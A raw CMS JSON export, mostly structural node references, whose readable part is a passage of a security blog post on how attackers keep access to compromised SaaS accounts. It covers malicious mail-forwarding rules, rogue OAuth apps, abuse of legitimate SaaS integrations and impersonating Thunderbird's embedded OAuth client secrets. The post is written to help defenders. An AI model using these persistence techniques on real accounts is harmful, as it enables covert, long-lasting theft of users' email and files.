nodeType":173},{},[],{"data":288459,"content":288460,"nodeType":235},{},[288461],{"data":288462,"marks":288463,"value":259729,"nodeType":173},{},[],{"data":288465,"content":288466,"nodeType":178},{},[288467],{"data":288468,"marks":288469,"value":259736,"nodeType":173},{},[],{"data":288471,"content":288472,"nodeType":178},{},[288473],{"data":288474,"marks":288475,"value":259743,"nodeType":173},{},[],{"data":288477,"content":288480,"nodeType":312},{"target":288478},{"sys":288479},{"id":259748,"type":317,"linkType":318},[],{"data":288482,"content":288483,"nodeType":235},{},[288484],{"data":288485,"marks":288486,"value":259756,"nodeType":173},{},[],{"data":288488,"content":288489,"nodeType":178},{},[288490],{"data":288491,"marks":288492,"value":259763,"nodeType":173},{},[],{"data":288494,"content":288497,"nodeType":312},{"target":288495},{"sys":288496},{"id":259768,"type":317,"linkType":318},[],{"data":288499,"content":288500,"nodeType":178},{},[288501],{"data":288502,"marks":288503,"value":259776,"nodeType":173},{},[],{"data":288505,"content":288506,"nodeType":178},{},[288507],{"data":288508,"marks":288509,"value":259783,"nodeType":173},{},[],{"data":288511,"content":288514,"nodeType":312},{"target":288512},{"sys":288513},{"id":259788,"type":317,"linkType":318},[],{"data":288516,"content":288517,"nodeType":169},{},[288518],{"data":288519,"marks":288520,"value":15539,"nodeType":173},{},[],{"data":288522,"content":288523,"nodeType":178},{},[288524],{"data":288525,"marks":288526,"value":259802,"nodeType":173},{},[],{"data":288528,"content":288529,"nodeType":250},{},[288530,288539,288548,288567],{"data":288531,"content":288532,"nodeType":254},{},[288533],{"data":288534,"content":288535,"nodeType":178},{},[288536],{"data":288537,"marks":288538,"value":259815,"nodeType":173},{},[],{"data":288540,"content":288541,"nodeType":254},{},[288542],{"data":288543,"content":288544,"nodeType":178},{},[288545],{"data":288546,"marks":288547,"value":259825,"nodeType":173},{},[],{"data":288549,"content":288550,"nodeType":254},{},[288551],{"data":288552,"content":288553,"nodeType":178},{},[288554,288557,288564],{"data":288555,"marks":288556,"value":259835,"nodeType":173},{},[],{"data":288558,"content":288559,"nodeType":186},{"uri":259838},[288560],{"data":288561,"marks":288562,"value":259844,"nodeType":173},{},[288563],{"type":194},{"data":288565,"marks":288566,"value":37,"nodeType":173},{},[],{"data":288568,"content":288569,"nodeType":254},{},[288570],{"data":288571,"content":288572,"nodeType":178},{},[288573,288576,288583],{"data":288574,"marks":288575,"value":259857,"nodeType":173},{},[],{"data":288577,"content":288578,"nodeType":186},{"uri":259860},[288579],{"data":288580,"marks":288581,"value":259866,"nodeType":173},{},[288582],{"type":194},{"data":288584,"marks":288585,"value":37,"nodeType":173},{},[],{"data":288587,"content":288588,"nodeType":178},{},[288589],{"data":288590,"marks":288591,"value":259876,"nodeType":173},{},[],{"data":288593,"content":288594,"nodeType":235},{},[288595],{"data":288596,"marks":288597,"value":40632,"nodeType":173},{},[],{"data":288599,"content":288600,"nodeType":178},{},[288601],{"data":288602,"marks":288603,"value":259889,"nodeType":173},{},[],{"data":288605,"content":288606,"nodeType":178},{},[288607],{"data":288608,"marks":288609,"value":259896,"nodeType":173},{},[],{"data":288611,"content":288612,"nodeType":178},{},[288613],{"data":288614,"marks":288615,"value":259903,"nodeType":173},{},[],{"items":288617},[288618,288620],{"sys":288619,"name":505},{"id":504},{"sys":288621,"name":509},{"id":508},{"items":288623},[288624],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":288625},{"url":8615},{"__typename":1528,"sys":288627,"content":288628,"title":209117,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":289291,"authorsCollection":289297},{"id":208338},{"json":288629},{"nodeType":165,"data":288630,"content":288631},{},[288632,288638,288644,288650,288656,288662,288668,288673,288689,288695,288731,288737,288743,288779,288795,288801,288807,288813,288829,288845,288851,288881,288887,288903,288909,288915,288941,288957,288963,288968,288974,288980,288986,288992,288998,289004,289010,289016,289022,289028,289034,289040,289053,289059,289115,289121,289127,289150,289163,289169,289175,289181,289207,289224,289230,289236,289242,289248,289264,289280,289285],{"nodeType":178,"data":288633,"content":288634},{},[288635],{"nodeType":173,"value":208347,"marks":288636,"data":288637},[],{},{"nodeType":178,"data":288639,"content":288640},{},[288641],{"nodeType":173,"value":208354,"marks":288642,"data":288643},[],{},{"nodeType":178,"data":288645,"content":288646},{},[288647],{"nodeType":173,"value":208361,"marks":288648,"data":288649},[],{},{"nodeType":178,"data":288651,"content":288652},{},[288653],{"nodeType":173,"value":208368,"marks":288654,"data":288655},[],{},{"nodeType":169,"data":288657,"content":288658},{},[288659],{"nodeType":173,"value":208375,"marks":288660,"data":288661},[],{},{"nodeType":178,"data":288663,"content":288664},{},[288665],{"nodeType":173,"value":208382,"marks":288666,"data":288667},[],{},{"nodeType":312,"data":288669,"content":288672},{"target":288670},{"sys":288671},{"id":208389,"type":317,"linkType":318},[],{"nodeType":178,"data":288674,"content":288675},{},[288676,288679,288686],{"nodeType":173,"value":208395,"marks":288677,"data":288678},[],{},{"nodeType":186,"data":288680,"content":288681},{"uri":88239},[288682],{"nodeType":173,"value":197982,"marks":288683,"data":288685},[288684],{"type":194},{},{"nodeType":173,"value":1477,"marks":288687,"data":288688},[],{},{"nodeType":178,"data":288690,"content":288691},{},[288692],{"nodeType":173,"value":208412,"marks":288693,"data":288694},[],{},{"nodeType":178,"data":288696,"content":288697},{},[288698,288701,288708,288711,288718,288721,288728],{"nodeType":173,"value":208419,"marks":288699,"data":288700},[],{},{"nodeType":186,"data":288702,"content":288703},{"uri":106815},[288704],{"nodeType":173,"value":208426,"marks":288705,"data":288707},[288706],{"type":194},{},{"nodeType":173,"value":933,"marks":288709,"data":288710},[],{},{"nodeType":186,"data":288712,"content":288713},{"uri":208435},[288714],{"nodeType":173,"value":208438,"marks":288715,"data":288717},[288716],{"type":194},{},{"nodeType":173,"value":208443,"marks":288719,"data":288720},[],{},{"nodeType":186,"data":288722,"content":288723},{"uri":162296},[288724],{"nodeType":173,"value":208450,"marks":288725,"data":288727},[288726],{"type":194},{},{"nodeType":173,"value":208455,"marks":288729,"data":288730},[],{},{"nodeType":178,"data":288732,"content":288733},{},[288734],{"nodeType":173,"value":208462,"marks":288735,"data":288736},[],{},{"nodeType":235,"data":288738,"content":288739},{},[288740],{"nodeType":173,"value":208469,"marks":288741,"data":288742},[],{},{"nodeType":178,"data":288744,"content":288745},{},[288746,288749,288756,288759,288766,288769,288776],{"nodeType":173,"value":208476,"marks":288747,"data":288748},[],{},{"nodeType":186,"data":288750,"content":288751},{"uri":184680},[288752],{"nodeType":173,"value":182807,"marks":288753,"data":288755},[288754],{"type":194},{},{"nodeType":173,"value":933,"marks":288757,"data":288758},[],{},{"nodeType":186,"data":288760,"content":288761},{"uri":197109},[288762],{"nodeType":173,"value":197114,"marks":288763,"data":288765},[288764],{"type":194},{},{"nodeType":173,"value":208497,"marks":288767,"data":288768},[],{},{"nodeType":186,"data":288770,"content":288771},{"uri":197770},[288772],{"nodeType":173,"value":208504,"marks":288773,"data":288775},[288774],{"type":194},{},{"nodeType":173,"value":208509,"marks":288777,"data":288778},[],{},{"nodeType":178,"data":288780,"content":288781},{},[288782,288785,288792],{"nodeType":173,"value":208516,"marks":288783,"data":288784},[],{},{"nodeType":186,"data":288786,"content":288787},{"uri":208521},[288788],{"nodeType":173,"value":208524,"marks":288789,"data":288791},[288790],{"type":194},{},{"nodeType":173,"value":208529,"marks":288793,"data":288794},[],{},{"nodeType":178,"data":288796,"content":288797},{},[288798],{"nodeType":173,"value":208536,"marks":288799,"data":288800},[],{},{"nodeType":178,"data":288802,"content":288803},{},[288804],{"nodeType":173,"value":208543,"marks":288805,"data":288806},[],{},{"nodeType":235,"data":288808,"content":288809},{},[288810],{"nodeType":173,"value":208550,"marks":288811,"data":288812},[],{},{"nodeType":178,"data":288814,"content":288815},{},[288816,288819,288826],{"nodeType":173,"value":208557,"marks":288817,"data":288818},[],{},{"nodeType":186,"data":288820,"content":288821},{"uri":208562},[288822],{"nodeType":173,"value":208565,"marks":288823,"data":288825},[288824],{"type":194},{},{"nodeType":173,"value":208570,"marks":288827,"data":288828},[],{},{"nodeType":178,"data":288830,"content":288831},{},[288832,288835,288842],{"nodeType":173,"value":208577,"marks":288833,"data":288834},[],{},{"nodeType":186,"data":288836,"content":288837},{"uri":144083},[288838],{"nodeType":173,"value":144086,"marks":288839,"data":288841},[288840],{"type":194},{},{"nodeType":173,"value":208588,"marks":288843,"data":288844},[],{},{"nodeType":178,"data":288846,"content":288847},{},[288848],{"nodeType":173,"value":208595,"marks":288849,"data":288850},[],{},{"nodeType":250,"data":288852,"content":288853},{},[288854,288863,288872],{"nodeType":254,"data":288855,"content":288856},{},[288857],{"nodeType":178,"data":288858,"content":288859},{},[288860],{"nodeType":173,"value":208608,"marks":288861,"data":288862},[],{},{"nodeType":254,"data":288864,"content":288865},{},[288866],{"nodeType":178,"data":288867,"content":288868},{},[288869],{"nodeType":173,"value":208618,"marks":288870,"data":288871},[],{},{"nodeType":254,"data":288873,"content":288874},{},[288875],{"nodeType":178,"data":288876,"content":288877},{},[288878],{"nodeType":173,"value":208628,"marks":288879,"data":288880},[],{},{"nodeType":178,"data":288882,"content":288883},{},[288884],{"nodeType":173,"value":208635,"marks":288885,"data":288886},[],{},{"nodeType":178,"data":288888,"content":288889},{},[288890,288893,288900],{"nodeType":173,"value":208642,"marks":288891,"data":288892},[],{},{"nodeType":186,"data":288894,"content":288895},{"uri":59335},[288896],{"nodeType":173,"value":208649,"marks":288897,"data":288899},[288898],{"type":194},{},{"nodeType":173,"value":208654,"marks":288901,"data":288902},[],{},{"nodeType":235,"data":288904,"content":288905},{},[288906],{"nodeType":173,"value":208661,"marks":288907,"data":288908},[],{},{"nodeType":178,"data":288910,"content":288911},{},[288912],{"nodeType":173,"value":208668,"marks":288913,"data":288914},[],{},{"nodeType":178,"data":288916,"content":288917},{},[288918,288921,288928,288931,288938],{"nodeType":173,"value":208675,"marks":288919,"data":288920},[],{},{"nodeType":186,"data":288922,"content":288923},{"uri":208680},[288924],{"nodeType":173,"value":208683,"marks":288925,"data":288927},[288926],{"type":194},{},{"nodeType":173,"value":933,"marks":288929,"data":288930},[],{},{"nodeType":186,"data":288932,"content":288933},{"uri":832},[288934],{"nodeType":173,"value":835,"marks":288935,"data":288937},[288936],{"type":194},{},{"nodeType":173,"value":208698,"marks":288939,"data":288940},[],{},{"nodeType":178,"data":288942,"content":288943},{},[288944,288947,288954],{"nodeType":173,"value":208705,"marks":288945,"data":288946},[],{},{"nodeType":186,"data":288948,"content":288949},{"uri":208710},[288950],{"nodeType":173,"value":208713,"marks":288951,"data":288953},[288952],{"type":194},{},{"nodeType":173,"value":208718,"marks":288955,"data":288956},[],{},{"nodeType":178,"data":288958,"content":288959},{},[288960],{"nodeType":173,"value":208725,"marks":288961,"data":288962},[],{},{"nodeType":312,"data":288964,"content":288967},{"target":288965},{"sys":288966},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":288969,"content":288970},{},[288971],{"nodeType":173,"value":208737,"marks":288972,"data":288973},[],{},{"nodeType":178,"data":288975,"content":288976},{},[288977],{"nodeType":173,"value":208744,"marks":288978,"data":288979},[],{},{"nodeType":178,"data":288981,"content":288982},{},[288983],{"nodeType":173,"value":208751,"marks":288984,"data":288985},[],{},{"nodeType":235,"data":288987,"content":288988},{},[288989],{"nodeType":173,"value":208758,"marks":288990,"data":288991},[],{},{"nodeType":178,"data":288993,"content":288994},{},[288995],{"nodeType":173,"value":208765,"marks":288996,"data":288997},[],{},{"nodeType":178,"data":288999,"content":289000},{},[289001],{"nodeType":173,"value":208772,"marks":289002,"data":289003},[],{},{"nodeType":178,"data":289005,"content":289006},{},[289007],{"nodeType":173,"value":208779,"marks":289008,"data":289009},[],{},{"nodeType":235,"data":289011,"content":289012},{},[289013],{"nodeType":173,"value":208786,"marks":289014,"data":289015},[],{},{"nodeType":178,"data":289017,"content":289018},{},[289019],{"nodeType":173,"value":208793,"marks":289020,"data":289021},[],{},{"nodeType":178,"data":289023,"content":289024},{},[289025],{"nodeType":173,"value":208800,"marks":289026,"data":289027},[],{},{"nodeType":178,"data":289029,"content":289030},{},[289031],{"nodeType":173,"value":208807,"marks":289032,"data":289033},[],{},{"nodeType":169,"data":289035,"content":289036},{},[289037],{"nodeType":173,"value":208814,"marks":289038,"data":289039},[],{},{"nodeType":178,"data":289041,"content":289042},{},[289043,289046,289050],{"nodeType":173,"value":208821,"marks":289044,"data":289045},[],{},{"nodeType":173,"value":208825,"marks":289047,"data":289049},[289048],{"type":1646},{},{"nodeType":173,"value":208830,"marks":289051,"data":289052},[],{},{"nodeType":235,"data":289054,"content":289055},{},[289056],{"nodeType":173,"value":208837,"marks":289057,"data":289058},[],{},{"nodeType":178,"data":289060,"content":289061},{},[289062,289065,289072,289075,289082,289085,289092,289095,289102,289105,289112],{"nodeType":173,"value":208844,"marks":289063,"data":289064},[],{},{"nodeType":186,"data":289066,"content":289067},{"uri":208849},[289068],{"nodeType":173,"value":208852,"marks":289069,"data":289071},[289070],{"type":194},{},{"nodeType":173,"value":933,"marks":289073,"data":289074},[],{},{"nodeType":186,"data":289076,"content":289077},{"uri":208861},[289078],{"nodeType":173,"value":208864,"marks":289079,"data":289081},[289080],{"type":194},{},{"nodeType":173,"value":208869,"marks":289083,"data":289084},[],{},{"nodeType":186,"data":289086,"content":289087},{"uri":208874},[289088],{"nodeType":173,"value":208877,"marks":289089,"data":289091},[289090],{"type":194},{},{"nodeType":173,"value":73790,"marks":289093,"data":289094},[],{},{"nodeType":186,"data":289096,"content":289097},{"uri":1297},[289098],{"nodeType":173,"value":208888,"marks":289099,"data":289101},[289100],{"type":194},{},{"nodeType":173,"value":208893,"marks":289103,"data":289104},[],{},{"nodeType":186,"data":289106,"content":289107},{"uri":208898},[289108],{"nodeType":173,"value":208901,"marks":289109,"data":289111},[289110],{"type":194},{},{"nodeType":173,"value":208906,"marks":289113,"data":289114},[],{},{"nodeType":178,"data":289116,"content":289117},{},[289118],{"nodeType":173,"value":208913,"marks":289119,"data":289120},[],{},{"nodeType":235,"data":289122,"content":289123},{},[289124],{"nodeType":173,"value":208920,"marks":289125,"data":289126},[],{},{"nodeType":178,"data":289128,"content":289129},{},[289130,289133,289137,289140,289147],{"nodeType":173,"value":208927,"marks":289131,"data":289132},[],{},{"nodeType":173,"value":208931,"marks":289134,"data":289136},[289135],{"type":194},{},{"nodeType":173,"value":208936,"marks":289138,"data":289139},[],{},{"nodeType":186,"data":289141,"content":289142},{"uri":208941},[289143],{"nodeType":173,"value":208944,"marks":289144,"data":289146},[289145],{"type":194},{},{"nodeType":173,"value":208949,"marks":289148,"data":289149},[],{},{"nodeType":178,"data":289151,"content":289152},{},[289153,289156,289160],{"nodeType":173,"value":208956,"marks":289154,"data":289155},[],{},{"nodeType":173,"value":208960,"marks":289157,"data":289159},[289158],{"type":1646},{},{"nodeType":173,"value":1477,"marks":289161,"data":289162},[],{},{"nodeType":178,"data":289164,"content":289165},{},[289166],{"nodeType":173,"value":208971,"marks":289167,"data":289168},[],{},{"nodeType":235,"data":289170,"content":289171},{},[289172],{"nodeType":173,"value":208978,"marks":289173,"data":289174},[],{},{"nodeType":178,"data":289176,"content":289177},{},[289178],{"nodeType":173,"value":208985,"marks":289179,"data":289180},[],{},{"nodeType":178,"data":289182,"content":289183},{},[289184,289187,289194,289197,289204],{"nodeType":173,"value":208992,"marks":289185,"data":289186},[],{},{"nodeType":186,"data":289188,"content":289189},{"uri":208997},[289190],{"nodeType":173,"value":209000,"marks":289191,"data":289193},[289192],{"type":194},{},{"nodeType":173,"value":209005,"marks":289195,"data":289196},[],{},{"nodeType":186,"data":289198,"content":289199},{"uri":209010},[289200],{"nodeType":173,"value":209013,"marks":289201,"data":289203},[289202],{"type":194},{},{"nodeType":173,"value":209018,"marks":289205,"data":289206},[],{},{"nodeType":178,"data":289208,"content":289209},{},[289210,289213,289221],{"nodeType":173,"value":209025,"marks":289211,"data":289212},[],{},{"nodeType":186,"data":289214,"content":289215},{"uri":209030},[289216],{"nodeType":173,"value":209033,"marks":289217,"data":289220},[289218,289219],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":289222,"data":289223},[],{},{"nodeType":178,"data":289225,"content":289226},{},[289227],{"nodeType":173,"value":209045,"marks":289228,"data":289229},[],{},{"nodeType":169,"data":289231,"content":289232},{},[289233],{"nodeType":173,"value":209052,"marks":289234,"data":289235},[],{},{"nodeType":178,"data":289237,"content":289238},{},[289239],{"nodeType":173,"value":209059,"marks":289240,"data":289241},[],{},{"nodeType":178,"data":289243,"content":289244},{},[289245],{"nodeType":173,"value":209066,"marks":289246,"data":289247},[],{},{"nodeType":178,"data":289249,"content":289250},{},[289251,289254,289261],{"nodeType":173,"value":209073,"marks":289252,"data":289253},[],{},{"nodeType":186,"data":289255,"content":289256},{"uri":209078},[289257],{"nodeType":173,"value":209081,"marks":289258,"data":289260},[289259],{"type":194},{},{"nodeType":173,"value":1477,"marks":289262,"data":289263},[],{},{"nodeType":178,"data":289265,"content":289266},{},[289267,289270,289277],{"nodeType":173,"value":209092,"marks":289268,"data":289269},[],{},{"nodeType":186,"data":289271,"content":289272},{"uri":88239},[289273],{"nodeType":173,"value":197982,"marks":289274,"data":289276},[289275],{"type":194},{},{"nodeType":173,"value":197986,"marks":289278,"data":289279},[],{},{"nodeType":312,"data":289281,"content":289284},{"target":289282},{"sys":289283},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":289286,"content":289287},{},[289288],{"nodeType":173,"value":37,"marks":289289,"data":289290},[],{},{"items":289292},[289293,289295],{"sys":289294,"name":505},{"id":504},{"sys":289296,"name":509},{"id":508},{"items":289298},[289299],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":289300},{"url":13981},{"__typename":1528,"sys":289302,"content":289303,"title":277468,"synopsis":289734,"hashTags":118,"publishedDate":289735,"slug":277469,"tagsCollection":289736,"authorsCollection":289740},{"id":276988},{"json":289304},{"nodeType":165,"data":289305,"content":289306},{},[289307,289314,289321,289328,289335,289342,289348,289355,289362,289369,289376,289382,289389,289395,289414,289421,289427,289445,289464,289483,289490,289497,289504,289511,289517,289523,289530,289537,289544,289551,289557,289564,289612,289618,289624,289642,289648,289655,289661,289668,289674,289681,289688,289694,289700,289706,289713,289720,289727],{"nodeType":178,"data":289308,"content":289309},{},[289310],{"nodeType":173,"value":289311,"marks":289312,"data":289313},"As an attacker, we have a wide range of persistence options available to us in a traditional account or endpoint compromise scenario. From discovering a user's password, to creating new backdoor accounts, to using one of an insane number of \"run keys\" to keep an implant running beyond reboot, or even moving laterally to other internal systems - an attacker has plenty of choice.",[],{},{"nodeType":178,"data":289315,"content":289316},{},[289317],{"nodeType":173,"value":289318,"marks":289319,"data":289320},"But how does this change in a SaaS-first world? In this post, we'll consider some of the new challenges and opportunities that are presented to an attacker who wants to maintain persistence in the new world order, so you can better investigate incidents and quickly defend against attacks. We'll cover a variety of techniques, including malicious mail rules, OAuth backdoor tricks and document sharing links to see how persistence can be maintained, even in the event of password changes and device wipes.",[],{},{"nodeType":169,"data":289322,"content":289323},{},[289324],{"nodeType":173,"value":289325,"marks":289326,"data":289327},"So what’s changed?",[],{},{"nodeType":178,"data":289329,"content":289330},{},[289331],{"nodeType":173,"value":289332,"marks":289333,"data":289334},"In a traditional compromise scenario, a common example would be an endpoint compromised through phishing, which is used to deliver a malicious implant to establish a command and control channel with the endpoint. In order to maintain access, an attacker would likely use one or more endpoint persistence methods to ensure their implant is launched again post-reboot when the user turns their laptop off for the day. ",[],{},{"nodeType":178,"data":289336,"content":289337},{},[289338],{"nodeType":173,"value":289339,"marks":289340,"data":289341},"This would often become a foothold into the internal network of the compromised organization. The endpoint or user is the start, but an attacker may seek to move laterally to other endpoints and servers on the internal network, where security is often much lower than the external perimeter.",[],{},{"nodeType":312,"data":289343,"content":289347},{"target":289344},{"sys":289345},{"id":289346,"type":317,"linkType":318},"5aSsHI9aZjsZIIXcV3YDYk",[],{"nodeType":178,"data":289349,"content":289350},{},[289351],{"nodeType":173,"value":289352,"marks":289353,"data":289354},"In a SaaS-first world, this situation has begun to change somewhat. There are many companies now that have significantly reduced the size of their internal networks or are even fully in the cloud and do not have any internal network infrastructure. In this case, traditional lateral movement becomes much more difficult or impossible. Additionally, endpoints are becoming increasingly hard targets to compromise and incident response teams have matured and have gotten better at cleaning up endpoint compromises. ",[],{},{"nodeType":178,"data":289356,"content":289357},{},[289358],{"nodeType":173,"value":289359,"marks":289360,"data":289361},"The consequence of this is that attackers need to make the most use of the access they have during an endpoint or user compromise and maintain access where possible, even in the event of a password reset and full laptop wipe. Additionally, new SaaS-focused persistence options are now possible, which are also often resistant to password changes and endpoints wipes, so these are increasingly attractive options for an attacker. ",[],{},{"nodeType":178,"data":289363,"content":289364},{},[289365],{"nodeType":173,"value":289366,"marks":289367,"data":289368},"One other change is that persistence is less binary than it has been traditionally. Typically, persistence would often be on a per-user or per-endpoint basis. Either an attacker would have full control of a user account (e.g. knowing the password) or full control of an endpoint (e.g. an implant running on the endpoint). The main differentiation would be in whether endpoint-level access was administrative level control over the endpoint or an implant running as a low-privileged user account. However, in the SaaS-world persistence is much more asset dependent and thus less binary. It could be persistent access to email, or documents, or chat conversations or any number of other assets and capabilities.",[],{},{"nodeType":235,"data":289370,"content":289371},{},[289372],{"nodeType":173,"value":289373,"marks":289374,"data":289375},"Mail rules",[],{},{"nodeType":312,"data":289377,"content":289381},{"target":289378},{"sys":289379},{"id":289380,"type":317,"linkType":318},"3bcLzOfZupSDatdzfFrJDQ",[],{"nodeType":178,"data":289383,"content":289384},{},[289385],{"nodeType":173,"value":289386,"marks":289387,"data":289388},"Mail rules are a handy feature found in most email clients. You might have used them to forward emails to your teammates while you’re off sipping Piña Coladas, or to move incoming email from that spammy colleague to the “don’t read” folder. However, they can also be used for a range of malicious activities, such as forwarding emails to an external address (e.g. password resets, invoices, “confidential” emails etc) or deleting emails (e.g. security alerts!). A good example of a real-world attack involving this technique was the 2020 SANS breach.\n",[],{},{"nodeType":312,"data":289390,"content":289394},{"target":289391},{"sys":289392},{"id":289393,"type":317,"linkType":318},"5RoIfopOGmTaORtG7fqYQo",[],{"nodeType":178,"data":289396,"content":289397},{},[289398,289402,289411],{"nodeType":173,"value":289399,"marks":289400,"data":289401},"If you want to read more about this technique, you can check out our ",[],{},{"nodeType":1698,"data":289403,"content":289407},{"target":289404},{"sys":289405},{"id":289406,"type":317,"linkType":318},"2zZ8kxP0t8Smi9b6hpT34k",[289408],{"nodeType":173,"value":155323,"marks":289409,"data":289410},[],{},{"nodeType":173,"value":1477,"marks":289412,"data":289413},[],{},{"nodeType":235,"data":289415,"content":289416},{},[289417],{"nodeType":173,"value":289418,"marks":289419,"data":289420},"OAuth attack #1: Custom OAuth app integration",[],{},{"nodeType":312,"data":289422,"content":289426},{"target":289423},{"sys":289424},{"id":289425,"type":317,"linkType":318},"7suW3GZpDsu2RnopkUiA3L",[],{"nodeType":178,"data":289428,"content":289429},{},[289430,289434,289442],{"nodeType":173,"value":289431,"marks":289432,"data":289433},"OAuth apps can be used to request permanent access to a set of permissions on behalf of a user. This can be as simple as the ability to verify a user’s identity for a simple social login or it could be as permissive as having full control over email, document stores, wiki pages, admin capabilities, etc. You can read more details about this in our ",[],{},{"nodeType":1698,"data":289435,"content":289438},{"target":289436},{"sys":289437},{"id":269483,"type":317,"linkType":318},[289439],{"nodeType":173,"value":155323,"marks":289440,"data":289441},[],{},{"nodeType":173,"value":197,"marks":289443,"data":289444},[],{},{"nodeType":178,"data":289446,"content":289447},{},[289448,289452,289460],{"nodeType":173,"value":289449,"marks":289450,"data":289451},"However, from an attacker’s perspective a custom OAuth app could be created with sensitive permissions and connected to a user’s account in order to maintain access to their data. In the event that an attacker has compromised a user’s account or endpoint, they could directly consent to their own malicious OAuth app on behalf of the user in order to gain persistence. This could also be achieved as part of a ",[],{},{"nodeType":1698,"data":289453,"content":289456},{"target":289454},{"sys":289455},{"id":269414,"type":317,"linkType":318},[289457],{"nodeType":173,"value":8091,"marks":289458,"data":289459},[],{},{"nodeType":173,"value":289461,"marks":289462,"data":289463}," attack to effectively compromise a user’s account and gain this persistence at the same time. In either case, this would enable continued access to the user’s data even if their password is changed and their endpoint fully wiped.   ",[],{},{"nodeType":178,"data":289465,"content":289466},{},[289467,289471,289479],{"nodeType":173,"value":289468,"marks":289469,"data":289470},"Attacks utilizing these types of techniques are becoming increasingly common and Microsoft even ",[],{},{"nodeType":186,"data":289472,"content":289474},{"uri":289473},"https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-OAuth-applications-used-to-compromise-email-servers-and-spread-spam/",[289475],{"nodeType":173,"value":289476,"marks":289477,"data":289478},"wrote about some real-world attacks",[],{},{"nodeType":173,"value":289480,"marks":289481,"data":289482}," they uncovered recently that involved the use of malicious OAuth apps.",[],{},{"nodeType":235,"data":289484,"content":289485},{},[289486],{"nodeType":173,"value":289487,"marks":289488,"data":289489},"OAuth attack #2: SaaS platform integration",[],{},{"nodeType":178,"data":289491,"content":289492},{},[289493],{"nodeType":173,"value":289494,"marks":289495,"data":289496},"A similar approach to using a custom OAuth app is to make use of legitimate SaaS services that allow an attacker to make sensitive integrations as a more hide-in-plain-sight approach. For example, let’s take the popular SaaS platform Canva, a graphic design tool that is used to create social media graphics, presentations, posters, documents and other visual content, as an example. Canva, like many SaaS platforms, allows you to make integrations with document stores like OneDrive and Google Drive in order to easily import and export files between Canva and them. If an attacker is interested primarily in maintaining access to a user’s files, then they could make an integration with a platform like Canva and then use that to maintain access.",[],{},{"nodeType":178,"data":289498,"content":289499},{},[289500],{"nodeType":173,"value":289501,"marks":289502,"data":289503},"While this doesn’t provide any raw capabilities beyond a custom OAuth app, an attacker may be more likely to go undetected in this scenario. Discovering an integration with a completely unknown, unverified OAuth app that hasn’t been seen in use elsewhere in the organization, or anywhere at all, is suspicious. Finding an integration with a major SaaS platform, particularly if it is one in use by other users in the organization, is much less suspicious. Additionally, many of them will have verified ticks having been through Microsoft’s or Google’s own verification processes. The only downside for an attacker is having to find SaaS platforms that request the correct permissions and provide the functionality that the attacker is looking for, whereas a custom OAuth app could be used to request any permissions and code could be written to use those permissions however an attacker would like.",[],{},{"nodeType":178,"data":289505,"content":289506},{},[289507],{"nodeType":173,"value":289508,"marks":289509,"data":289510},"If a custom OAuth app is the equivalent of a custom implant on an endpoint, then using a legitimate SaaS platform integration is the equivalent of a more living-off-the-land approach, such as using TeamViewer, RDP or Powershell, etc.\n",[],{},{"nodeType":312,"data":289512,"content":289516},{"target":289513},{"sys":289514},{"id":289515,"type":317,"linkType":318},"53pL4O8zgfLBKqZbbcN3aI",[],{"nodeType":312,"data":289518,"content":289522},{"target":289519},{"sys":289520},{"id":289521,"type":317,"linkType":318},"6ovQnE1bu7tVCJr4OfzfhI",[],{"nodeType":235,"data":289524,"content":289525},{},[289526],{"nodeType":173,"value":289527,"marks":289528,"data":289529},"OAuth attack #3: Legitimate desktop/mobile app impersonation",[],{},{"nodeType":178,"data":289531,"content":289532},{},[289533],{"nodeType":173,"value":289534,"marks":289535,"data":289536},"Ok, we promise this is the last OAuth variation example - but it’s another interesting way to abuse OAuth connections! Previously, we spoke of either connecting a custom OAuth app or using an OAuth integration via a legitimate SaaS platform. A custom OAuth app has the most flexibility for an attacker, but looks far more suspicious if discovered, whereas a legitimate SaaS platform looks much more….well, legitimate!",[],{},{"nodeType":178,"data":289538,"content":289539},{},[289540],{"nodeType":173,"value":289541,"marks":289542,"data":289543},"What if you could have both of those advantages in one? Well, that can be achieved, too! The reason SaaS platforms don’t have the same flexibility is because they keep their client IDs and secrets for their apps so the attacker can only use the OAuth app indirectly via the features provided by the SaaS platform. However, some OAuth connections are made using desktop or mobile apps that obviously can’t keep their OAuth app secrets secret from a user. While it is generally not possible for an attacker to make use of these in a consent phishing attack, due to not controlling the reply URLs, they can be used in a pure persistence scenario with an already compromised account. ",[],{},{"nodeType":178,"data":289545,"content":289546},{},[289547],{"nodeType":173,"value":289548,"marks":289549,"data":289550},"Let’s take Mozilla Thunderbird, a cross-platform email client, as an example. The client IDs and secrets for different OAuth apps are actually stored in the source code in this case: ",[],{},{"nodeType":312,"data":289552,"content":289556},{"target":289553},{"sys":289554},{"id":289555,"type":317,"linkType":318},"3Ed90clKC3GG4BcPfeV6Nm",[],{"nodeType":178,"data":289558,"content":289559},{},[289560],{"nodeType":173,"value":289561,"marks":289562,"data":289563},"As an attacker, this gives us multiple advantages. ",[],{},{"nodeType":250,"data":289565,"content":289566},{},[289567,289582,289597],{"nodeType":254,"data":289568,"content":289569},{},[289570],{"nodeType":178,"data":289571,"content":289572},{},[289573,289578],{"nodeType":173,"value":289574,"marks":289575,"data":289577},"App Impersonation",[289576],{"type":370},{},{"nodeType":173,"value":289579,"marks":289580,"data":289581}," - These are client IDs that will be seen in use legitimately by other users and we can impersonate them. In Thunderbird’s case, the Microsoft app isn’t actually a verified app but the Google one shows as verified. Whatever the case, it looks much less suspicious than a completely unknown app with no known business use case. ",[],{},{"nodeType":254,"data":289583,"content":289584},{},[289585],{"nodeType":178,"data":289586,"content":289587},{},[289588,289593],{"nodeType":173,"value":289589,"marks":289590,"data":289592},"Flexible Use",[289591],{"type":370},{},{"nodeType":173,"value":289594,"marks":289595,"data":289596}," - We have access to the client IDs and secrets, so we can do whatever we want with the OAuth integration, writing custom code to query APIs as we please. We are not limited to the functionality provided by Thunderbird itself.\n",[],{},{"nodeType":254,"data":289598,"content":289599},{},[289600],{"nodeType":178,"data":289601,"content":289602},{},[289603,289608],{"nodeType":173,"value":289604,"marks":289605,"data":289607},"Arbitrary Permission 